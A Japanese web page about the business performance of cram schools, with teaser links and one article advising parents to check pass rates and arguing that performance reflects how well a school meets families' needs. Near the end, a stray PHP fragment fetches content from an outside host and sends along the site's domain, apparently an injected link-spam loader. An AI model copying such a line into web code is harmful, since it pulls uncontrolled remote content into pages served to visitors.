前へ
次へ

塾の業績に関する事について

最近の日本の塾という所はコンスタントに業績を上げていると言われているのです。それはどういう事かという

more

個別塾の業績で生徒が30人以下は赤字傾向

学習塾の業績というといろいろな評判がありますが、私の知っている範囲でお話をさせてもらいます。塾は昔に

more

塾の業績とはどのように図るか。

最近は、学歴社会と言われ、大学のランクで、ある程度の就職先が決まることもある時代です。そんな時代で、

more

塾の業績をチェックすること

塾に通う際には、出来るだけ業績のチェックを行っておくと良いです。受験対策で通うのであれば、どういう学校への合格率が高いのかということを知っておくと、何かと便利ですし、目指す学校の方向性も分かってくるのです。合格率が高いということは、適切な指導をしてくれているということにもなります。安心をして勉強をすることが出来る、より効果のある勉強をすることができる、というのはとても大切です。また、塾を選ぶ際には、どうしても合格率は気になってくるものですし、確認をしたほうが良い項目でもあるのです。インターネットでもチェックをすることが出来るようになっているので、通うことを考えた場合には業績についての確認も行っておくと良いです。塾はサービス業です。授業料や入塾料としてお金を頂き、授業や進路指導などの教育をサービスします。保護者や生徒からの要望は様々です。学習の習慣をつける、成績を向上させる、志望校に合格させるなど、個々に合わせたサービスが必要になります。また、塾にとって業績とは、そのサービスが顧客に満足頂けているのかを確認する一つの目安になります。生徒や保護者の希望する志望校に合格させることができる、学校での成績が向上するなどの要望に、もし応えることができていないならば、通うことを辞めてしまう生徒が増えるでしょう。そして業績は悪くなっていくでしょう。そのことによって、優秀な講師を雇うことができなくなります。十分な設備を整えることができなくなります。そうなれば、更に生徒はその塾を選ばなくなります。業績が悪化する悪循環になってしまうでしょう。業績を上げるためには、講座をたくさん受講してもらう、生徒数を増やす、などという単に売り上げを上げることだけに注目するのではなく、生徒や保護者がどのような教育サービスを求めているのかを察し、それにしっかりと応えていくことが重要なのです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top